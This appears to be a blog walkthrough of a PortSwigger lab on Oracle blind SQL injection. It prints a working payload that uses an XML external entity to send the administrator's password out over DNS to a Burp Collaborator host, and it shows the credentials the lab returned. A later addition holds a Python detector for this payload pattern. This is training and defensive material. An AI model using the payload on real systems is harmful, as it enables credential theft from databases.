Burp Suite Labs ---- SQL Injection 17 ---- Oracle DNS Out-of-Band Exfiltration

Lab URL

https://portswigger.net/web-security/sql-injection/blind/lab-out-of-band-data-exfiltration

Walkthrough

Payload template:
'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--
1. Obtain the default DNS (Collaborator) subdomain from Burp Suite


2. Replace BURP-COLLABORATOR-SUBDOMAIN with the subdomain you obtained
'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.86cqq9vs9yhbsyygo7t4lmjvqmwck1.oastify.com/">+%25remote%3b]>'),'/l')+FROM+dual--
3. Success

Retrieved account credentials
administrator tiyq3pay84ugnxx5f5ig
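
Added example (not part of the original post): a defender-side check that URL-decodes a request value and flags the payload shape used above, where Oracle's xmltype/EXTRACTVALUE parses an external parameter entity whose SYSTEM URL is built by concatenating a subquery with a callback host. The function names and the two benign sample values are assumptions made for this illustration.

```python
import re
from urllib.parse import unquote_plus

# Oracle XML functions that will parse a DTD supplied inside the SQL text.
XML_FUNCS = re.compile(r"\b(?:xmltype|extractvalue)\s*\(", re.I)
# External parameter entity whose SYSTEM URL is assembled with SQL
# concatenation: "http://' || (<subquery>) || '.<callback host>/"
OOB_ENTITY = re.compile(
    r"<!ENTITY\s+%\s+\w+\s+SYSTEM\s+\"(?:https?|ftp)://'\s*\|\|\s*"
    r"\((?P<subquery>.+?)\)\s*\|\|\s*'\.?(?P<host>[A-Za-z0-9.-]+)",
    re.I | re.S,
)

def decode(value: str, max_rounds: int = 3) -> str:
    """URL-decode repeatedly (bounded) so double-encoded input is still seen."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect(raw_value: str):
    """Return details of an Oracle XXE out-of-band payload, or None."""
    text = decode(raw_value)
    if not XML_FUNCS.search(text):
        return None
    match = OOB_ENTITY.search(text)
    if match is None:
        return None
    return {
        "callback_host": match.group("host").lower(),
        "subquery": " ".join(match.group("subquery").split()),
    }

# Constructed sample inputs. The first is the payload template from this page
# with its placeholder left in; the other two are benign values made up here.
SAMPLES = [
    """'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--""",
    "x9Kq2LmPz7",
    "notes+about+xmltype(+usage+in+reports",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(inspect(sample))
```

The extracted callback host and subquery give an analyst the destination to look for in DNS logs and the data the request was trying to read.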

posted @ 2023-08-18 19:34  BattleofZhongDinghe